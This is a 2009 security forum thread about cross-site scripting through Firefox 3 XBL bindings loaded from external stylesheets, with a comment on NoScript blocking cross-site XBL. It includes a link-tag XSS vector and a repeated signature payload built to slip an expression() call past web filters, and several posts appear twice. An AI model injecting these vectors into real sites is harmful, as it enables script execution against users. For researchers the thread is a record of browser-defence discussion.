Paid Advertising
SLA.CKERS.ORG
HA.CKERS SLACKING
Q and A for any cross site scripting information. Feel free to ask away.
XBL Firefox3
Posted by: Gareth Heyes (IP Logged)
Date: March 09, 2009 09:00AM
Seems to work with external linked style sheets again:-
<link href="http://www.businessinfo.co.uk/labs/xss/binding.css" type=text/css rel=stylesheet media=all>
------------------------------------------------------------------------------------------------------------
"-/style=-=expression(/*WAFs..Evasion..Filters'/-/*',/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//);"
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]
<link href="http://www.businessinfo.co.uk/labs/xss/binding.css" type=text/css rel=stylesheet media=all>
------------------------------------------------------------------------------------------------------------
"-/style=-=expression(/*WAFs..Evasion..Filters'/-/*',/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//);"
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]
Re: XBL Firefox3
Posted by: Gareth Heyes (IP Logged)
Date: March 09, 2009 10:48AM
@nEUrOO
Thanks for adding that, I forgot to add that exact reference. Shame on me. *Slaps self on head*
------------------------------------------------------------------------------------------------------------
"-/style=-=expression(/*WAFs..Evasion..Filters'/-/*',/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//);"
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]
Thanks for adding that, I forgot to add that exact reference. Shame on me. *Slaps self on head*
------------------------------------------------------------------------------------------------------------
"-/style=-=expression(/*WAFs..Evasion..Filters'/-/*',/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//);"
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]
Re: XBL Firefox3
Posted by: ma1 (IP Logged)
Date: March 09, 2009 11:25AM
Looks like it's not "again": we had been too much happy for the "fix" in Fx 3, overlooking that it didn't prevent 3rd party stylesheets from loading XBL from their domains.
The correct approach IMHO (and what I believe everybody including Jonas Sicking mistakenly assumend the previous "fix" was about) is NoScript's: blocking every cross-site XBL.
On a good.com page, even if a 3rd party stylesheet, let's say from evil.com, tries to load a XBL from the same evil.com domain (not cross-site in respect of the stylesheet), NoScript blocks the XBL anyway because its domain is different from the document's.
--
*hackademix.net*
There's a browser safer than Firefox... Firefox, with NoScript
The correct approach IMHO (and what I believe everybody including Jonas Sicking mistakenly assumend the previous "fix" was about) is NoScript's: blocking every cross-site XBL.
On a good.com page, even if a 3rd party stylesheet, let's say from evil.com, tries to load a XBL from the same evil.com domain (not cross-site in respect of the stylesheet), NoScript blocks the XBL anyway because its domain is different from the document's.
--
*hackademix.net*
There's a browser safer than Firefox... Firefox, with NoScript
Re: XBL Firefox3
Posted by: Gareth Heyes (IP Logged)
Date: March 09, 2009 11:40AM
@ma1
Very nice and that makes total sense. Shame FF doesn't do that by default.
------------------------------------------------------------------------------------------------------------
"-/style=-=expression(/*WAFs..Evasion..Filters'/-/*',/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//);"
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]
Very nice and that makes total sense. Shame FF doesn't do that by default.
------------------------------------------------------------------------------------------------------------
"-/style=-=expression(/*WAFs..Evasion..Filters'/-/*',/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//);"
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]
Sorry, only registered users may post in this forum.
sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle.
SecTheory Security Consulting *